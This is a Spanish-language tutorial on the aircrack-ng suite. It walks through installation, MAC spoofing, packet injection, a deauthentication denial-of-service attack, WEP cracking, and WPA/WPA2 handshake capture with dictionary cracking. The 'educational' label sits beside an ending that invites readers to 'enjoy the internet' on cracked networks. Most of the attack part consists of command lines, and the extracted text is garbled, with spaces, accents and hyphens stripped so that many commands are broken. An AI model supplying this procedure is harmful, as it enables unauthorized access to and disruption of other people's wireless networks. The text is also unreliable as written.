TUTORIALDEAIRCRACKNG

Paolo Norambuena
Estudiante Ingeniera (e) en Computacin e Informtica Universidad del Bo-Bo, Concepcin.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

AIRCRACKNG
EstaesunaguaconfineseducativosparaelusoymanipulacindeAircrackng sobre las distintas distribuciones de Linux. Se explicar desde su instalacin en sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que posteriormentenoexistandudassobreningunadistribucin.

En primer lugar debemos tener instalado en nuestro sistema el Driver del Fabricante de nuestra tarjeta de red, aircrackng no funciona con drivers

emuladosporndiswrapper.

InstalandoAircrackng

En este apartado instalaremos aircrackng en las distintas distribuciones comenzandoporUbuntu.

Ubuntu.

$sudoaptgetinstallaircrackng

Mandriva

#urpmiaircrackng OpenSUSE

Descargar:
ftp://ftp.pbone.net/mirror/packman.iubremen.de/suse/11.0/SRPMS/aircrackng1.0rc3 0.pm.1.nosrc.rpm

InstalarhaciendoDobleClickalpaqueteunavezdescargado.

SlackWare

Descargar http://repository.slacky.eu/slackware12.2/security/aircrackng/1.0rc3/aircrackng 1.0rc3i4861dd.tgz

Unavezdescargadoporconsola(terminalkonsole,etc),ejecutar

#installpkgaircrackng1.0rc3i4861dd.tgz

Paquetescomplementarios.

Unavezinstaladoaircrackngpuedesernecesariolainstalacindeunpaquete adicional por lo cual descargaremos IW, que es un complemento para poner nuestratarjetainalmbricaenmodomonitor.

segnladistribucinsernecesarioactualizarlalibreralibnl $sudoaptgetinstalllibnl1*(ubuntu,debian) #urpmialibnl(mandriva)

Instaladay/oactualizadalalibreraprocedemosadescargariw.

#wgethttp://wireless.kernel.org/download/iw/iw0.9.13.tar.bz2 #tarjxvfiw0.9.13.tar.bz2 #cdiw0.9.13 #make #makeinstall

Ydeestaformayatenemosaircrackngysucomponenteparaponerenmodo monitornuestrawireless.

Ahorasolonosquedaempezaratrabajar.

RecuperandoClaves.
Ahoraempezamosnuestrotrabajo,loqueserealizanteriormentesolosehace unavez,queesparainstalaryconfigurardebuenaformanuestrasuite,loquese realizasiempreesloqueacontinuacinsedetalla.

Paraquienescreenquecambiarsumacesnecesario,puedenhacerloasi

Mandriva:

#ifconfig(wlan0,eth1,etc)down #ifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55 #ifconfig(wlan0,eth1,etc)up

Debian/Ubuntu:

$sudoifconfig(wlan0,eth1,etc)down $sudoifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55 $sudoifconfig(wlan0,eth1,etc)up

Slackware:

#ifconfig(wlan0,eth1,etc)down #ifconfig(wlan0,eth1,etc)hwether00:11:22:33:44:55 #/etc/rc.d/rc.inet1(wlan0,eth1,etc)start

IMPORTANTE:LasdireccionesmacSIEMPREdebeniniciarcon00

ParasabercualesnuestraMACdebemosejecutar

#ifconfig(wlan0,eth1,etc)|grepHwaddr

De la vista anterior podemos sacar nuestra direccin mac de HWaddr la serie numerica queacompaa lainstruccin antes destacada es nuestradireccin, queutilizaremosdesdeahoraenadelante.

Airmonng.
Airmonng es parte de la suite de aircrackng la cual permite crear la interfazmon0enmodomonitor.Suutilizacineslasiguiente

#airmonngstart(wlan0,eth1,etc)

En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. #iwdevwlan0interfaceaddmon0typemonitor

Yconestoyatenemoselprimerpasocompleto.

Airodumpng

#airodumpngmon0

Deestaformaveremostodaslasredesdisponiblesconsusrespectivoscanales, una vez que ya encontramos nuestra red creamos un filtro con el canal de trabajo,enestecasocanal6(columnaCH),paramoslaejecucindeairodump ngpresionandoCtrl+C,yposteriormenteejecutamos:

c=Filtrodecanal6,11,1,etc. w=Escribirresultadosenundocumento.

#airodumpngc6wnombremon0

Deestaformahemoscreadounfiltroquesolotrabajarenelcanalindicado(6).

NuestraredesJimmy AireplayNg

Unavezqueairodumpngyaesttrabajando,abrimosunanuevaconsoladonde empezaremosatrabajarconaireplayng.

Loprimeroquedebemoshacerconaireplayngesasociarnosalared.

#aireplayng16000q10o1e(ESSIDRouter)a(MacRouter)h(nuestramac) mon0

Donde: 16000=Autentificarcada6000segundos. q10=IntervalodetiempoenqueenviarunpaqueteKeepAlive o1=Cantidaddepaqueteskeepallivequeenviar

Creoquemuchossepuedenpreguntar,dedondeobtengoelESSIDylaMacdel Router?.Bueno,sirecordamosenlaconsolaanteriorejecutamosairodumpng,de esapantallaencontramoslascolumnasBSSIDyESSIDquecorrespondenalamac ylaESSIDonombredelrouterrespectivamente.

Deestaformaestaremosasociadosalaredlacualcada10segundosaireplayng mandarunpaquetellamadoKEEPALIVE,loqueavisaralrouterqueseguimos asociadosyasinonosbotaracadarato.

Yaasociadosprocedemosaenviarycapturarpaquetes,paraesoenunanueva consolaejecutaremosnuevamenteaireplayngperoenmodoagresivo.

#aireplayng3b(Macdelrouter)h(nuestramac)mon0

DelaimagenanteriorloquenosinteresaesqueaumentenlosARP,yaqueson esoslospaquetescapturadosylosqueademsnosentregarnlaclavebuscada. Unavezquetenemosdesde150.000paquetescapturadosempezamosatrabajar conaircrackng.

Nuncaestdemsrecordarquemientrasmaspaquetescapturados,esmucho mejor,yaquemsprontoobtendremoslaclave.

EncasodequeesteataquenocapturepaquetesARPoqueenmuchotiempo hayamos capturado pocos paquetes, podemos realizar un Ataque DoS (DenegacindeServicios).Pararealizaresteataqueesnecesariosimplemente saberladireccinMacdelRouter,datoqueporlodems,hemosutilizadopara cadaaccinconaircrackngysuscomponentes.

AhoraComorealizamoselataqueDoSconaircrackng?

R://#aireplayng00a(MacRouter)mon0

Conesoyaestaramosacelerandolatransferenciaycapturadepaquetes.

AircrackNg

Ya estamos en el paso final, con los paquetes de datos capturados procedemosaejecutaraircrackng,paralocualtenemosdosformas,unalenta peroefectiva,yunarpidaperosenecesitaunamayorcantidaddepaquetes paradesencriptarlaclave. Formalenta #aircrackng*.cap

FormaRpida(senecesitamayorcantidaddepaquetescapturados) #aircrackngz*.cap

De esta forma ya hemos desencriptado la clave que buscabamos, solo nos quedahacerconfigurarlaclaveenelclientedeconexinparaesosolotienen queborrarlosdospuntos(:)quehayentrecadapardecaracteres,ahoraa disfrutardeinternet.

Recordatorio.

Alfinalizarestetutorial,caberecordarqueladistanciaafectanuestrotrabajo, siestamosmuylejosdelaredaatacarlatransferenciaycapturadepaquetes sermuylentallegandoinclusoasernula.Porlocualesrecomendableestara unadistanciaprudenteparapoderrealizarlacapturadeformarpida.

Losdriversparalastarjetasinalambricasdebenserlospropietarios,nosepuede realizarporemulacindedrivers,enestecasoconndiswrapper,porejemplo.

LasaccionesdebenserejecutadascomoSuperUsuario(root)enlossistemas quelopermitan,encasodeUbuntu,sedebeejecutarconsudo.

Las direcciones mac SIEMPRE deben iniciar con 00 en caso de que las cambienenformamanual.

Sinoaireplayngnoinyectanicapturapaquetes,realizamosunataqueDoS conaireplay#aireplayng00a(MacRouter)mon0

Todoloquetenga#enUbuntusedebeejecutarconsudo.

Finalizando.
Esperoqueestetutorialseadeutilidadparacadapersonaquelolea.Estetutorial est enfocado en una forma de ataque, en aircrackng existen muchos otros mtodos,algunosmscomplicadosqueotros,perolaideaesaprenderyadoptar laformamscmodaparacadauno.

AgradecimientosAnbalChavoZapata,porlainstruccindeataqueDoS. Informacin recopilada de distintos sitios de internet, especialmente de http://www.aircrackng.org/doku.phpsitiooficialdeAircrackng.

Encasodeduda,contactarawjotta@gmail.com

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.

Parte2: Recuperando Claves WPA/WPA2Con Aircrackng

Introduccin.
De seguro muchos se han preguntado, como poder recuperar la clave wpa/wpa2demiroutersintenerqueresetearlo?,buenoaligualqueantes,la respuestaesconaircrackng.

Enestaseccinsedemostrarcomoenunospocospasossepuedeobtenerla claveenformarpida,losingredientespararecuperarestasclavesson:

Equipocontarjetainalambrica. DistrodeLinuxInstaladaoLiveCD. SuiteAircrackNGinstalada(sedetalloenlaprimeraparte). Diccionariodepalabras. SaberladireccinMACdenuestratarjeta(sevioenlaseccinanterior)

airmonng

Comenzandoconestapartedebemosponernuestratarjetaenmodomonitor

#airmonngstart(wlan0,eth1,etc)

En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. #iwdevwlan0interfaceaddmon0typemonitor

Yconestoyatenemoselprimerpasocompleto.

Airodumpng

#airodumpngc(numerodecanal)w(nombrearchivo)mon0

Asestamosescaneandolasredesexistentesenunsolocanal,estaconsoladebe seguirtrabajandosinserdetenida.

Deestapantallanecesitaremoslossiguientesdatosconloscualestrabajaremosel restodeltutorial. NombredelRouter(ESSID):wifiubb MacdelRouter(BSSID):00:1A:70:EE:5E:D6 DireccinMACdeuncliente:00:16:44:A2:40:D4

Aireplayng

Yatenemoslosdatosnecesariosyairodumpngsigueenfuncionamiento,porlo cualahoraeselturnodeaireplayng.

Enunanuevaconsolaejecutamos: #aireplayng01a00:1A:70:EE:5E:D6c00:16:44:A2:40:D4mon0

dondetenemos

0:deautenticacin 1 : es el nmero de deautenticaciones enviadas (puedes enviar infinitas si se deseas.Parainfinitoes0) a:esladireccinMACdelpuntodeaccesooRouter c:esladireccinMACdelclientequequeremosdeautenticar De esta forma estamos capturando el handshake que necesitamos para desencriptarlaclave.

Una vez que se ha captura el handshake ejecutamos aircrackng para su desencriptacin.

Paraaircracklasinstruccionessonlassiguientes #aircrackngwdiccionariob00:1A:70:EE:5E:D6*.cap

Yposteriormente,obtendremosnuestraclaveconunasalidacomoesta

Recomendaciones. ParatrabajarconclavestipoWPA/WPA2esnecesariopodercontarconunbuen diccionariodepalabras,yaqueeltrabajodeaircrackngesircomparandoel handshakeconcadaunadelaspalabrasdeldiccionarioquetenemos. Puedendescargarundiccionariodepalabrasdesdeaqu http://wjota.uuuq.com/tutoriales/diccionario.zip Que es el diccionario que se utiliz para el ejemplo, y puede ser modificado, agregandooquitandopalabras.

TutorialdeAircrackngbyPaoloNorambuenaislicensedunderaCreative CommonsAtribucinNoComercialLicenciarIgual2.0ChileLicense.